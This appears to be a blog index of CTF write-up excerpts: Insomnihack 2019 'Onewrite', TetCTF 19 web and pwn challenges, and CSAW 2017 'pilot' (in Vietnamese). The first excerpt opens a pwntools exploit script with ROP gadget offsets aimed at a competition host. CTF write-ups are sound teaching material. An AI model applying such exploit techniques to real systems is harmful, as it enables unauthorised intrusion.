Insomnihack Teaser CTF 2019

Onewrite - Pwn from __future__ import print_function from pwn import * import os GDBSCRIPT = """ """ HOST = 'onewrite.teaser.insomnihack.ch' PORT = 1337 BIN = './onewrite' PROMPT = "> " STACK = "1" PIE = "2" ADDR = "address : " DATA = "data : " e = ELF(BIN) addrs = { 'poprax': 0x460ac, 'poprdxrsi': 0x484e9, 'poprdi': 0x84fa, 'syscall': 0x6e605, 'poprsp': 0x946a } if os.environ.has_key('remote'): r = remote(HOST, PORT) else: r = process(e.

Read more

TetCTF 19

Web - IQTest2 (unsolved) Pwn - Easy webserver (unsolved) Pwn - Babysandbox Pwn - Babyheap Pwn - Babyfirst Web IQTest2 After looking at the source code, there is a path that we can polute the $level variable to pass. It has to pass several condition check: if (isset($_COOKIE['saved']) && !empty($_COOKIE['saved']) && isset($_COOKIE['hash']) && !empty($_COOKIE['hash'])) { $saved = base64_decode($_COOKIE["saved"]); $seed = urldecode(substr($saved, 5 )); } if( md5($GLOBALS['secret'].

Read more

CSAW CTF 2017 Qualification

pwn: pilot (75 pts.) English version here Vietnamese Năm nay mình có cơ hội chơi CSAW CTF một cách thực sự, với hy vọng team đủ khỏe để vào final North America lần nữa. Qua một năm được các tiền bối thông não (quangltm và anh tuanit96), mình đã quẩy được vài bài khá cơ bản. Đây là bài đầu tiên mình owned trong giờ thi. Bài này là một bài buffer overflow cơ bản.

Read more